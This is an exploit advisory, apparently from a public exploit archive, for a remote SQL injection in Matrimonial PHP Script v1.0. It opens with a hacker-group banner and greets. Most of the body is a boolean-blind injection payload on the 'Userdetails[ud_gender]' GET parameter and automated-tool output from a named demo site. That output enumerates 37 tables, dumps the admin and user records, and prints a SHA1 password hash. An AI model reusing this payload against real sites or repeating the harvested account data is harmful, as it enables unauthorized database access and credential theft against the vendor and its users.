Headline
Matrimonial PHP Script 1.0 SQL Injection
Matrimonial PHP Script version 1.0 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Exploits ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr │ │ :│ Website : uisort.com │ │ ││ Vendor : Uisort Technologies Pvt. Ltd. │ │ ││ Software : Matrimonial PHP Script v1.0 │ │ Matrimonial Script PHP tailored with ││ Demo : stage.matrimic.in │ │ advanced features website ││ Vuln Type: Remote SQL Injection │ │ & mobile apps from matrimic ││ Method : GET │ │ ││ Impact : Database Access │ │ ││ │ │ ││────────────────────────────────────────────┘ └─────────────────────────────────────────││ B4nks-NET irc.b4nks.tk #unix ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ Typically used for remotely exploitable vulnerabilities that can lead to ││ system compromise. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2022 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'Userdetails[ud_gender]' is vulnerable---Parameter: Userdetails[ud_gender] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Userdetails[ud_gender]=1 AND 2636=2636---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.0.0[INFO] fetching current database[INFO] retrieved: stage_db_qa[INFO] fetching number of tables for database 'stage_db_qa'Database: stage_db_qa[37 tables]+--------------------+| YiiCache || YiiLog || mc_admin || mc_blocklist || mc_caste || mc_city || mc_cms || mc_contact || mc_contact_history || mc_country || mc_currency || mc_deleteprofile || mc_education || mc_feedback || mc_gallery || mc_height || mc_horoscope || mc_import_jobs || mc_interest || mc_language || mc_message || mc_occupation || mc_partner || mc_plan || mc_profile_viewed || mc_religion || mc_searchlist || mc_settings || mc_shortlist || mc_sms_history || mc_state || mc_subcaste || mc_success_story || mc_toungue || mc_transaction || mc_user || mc_userdetails |+--------------------+[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'Database: stage_db_qaTable: mc_admin[4 columns]+--------------+-------------+| Column | Type |+--------------+-------------+| admin_email | varchar(32) || admin_id | int(11) || admin_name | varchar(32) || admin_status | int(11) |+--------------+-------------+[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'Database: stage_db_qaTable: mc_admin[1 entry]+----------+-----------------------+------------+--------------+| admin_id | admin_email | admin_name | admin_status |+----------+-----------------------+------------+--------------+| 1 | admin@mat\x81imic.com | Admin | 1 |+----------+-----------------------+------------+--------------+[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'Database: stage_db_qaTable: mc_user[20 columns]+------------------------+--------------+| Column | Type |+------------------------+--------------+| api_token | varchar(255) || code | varchar(128) || device | varchar(32) || user_activecode | varchar(32) || user_activedate | datetime || user_activestatus | int(11) || user_android_device_id | varchar(255) || user_email | varchar(32) || user_id | int(11) || user_ios_device_id | varchar(255) || user_ipaddress | varchar(32( || user_lastlogin | datetime || user_mobile | bigint(20) || user_opensource | varchar(32) || user_password | varchar(255) || user_salt | varchar(64) || user_status | int(11) || user_type | int(11) || user_userid | int(11) || user_verified_token | varchar(255) |+------------------------+--------------+[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'Database: stage_db_qaTable: mc_user[1 entry]+---------+--------------------+------------------------------------------+-----------+-------------+| user_id | user_email | user_password | user_type | user_userid |+---------+--------------------+------------------------------------------+-----------+-------------+| 1 | [email protected] | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1 | 1 |+---------+--------------------+------------------------------------------+-----------+-------------+ Possible Algorithms: SHA1 [-] Done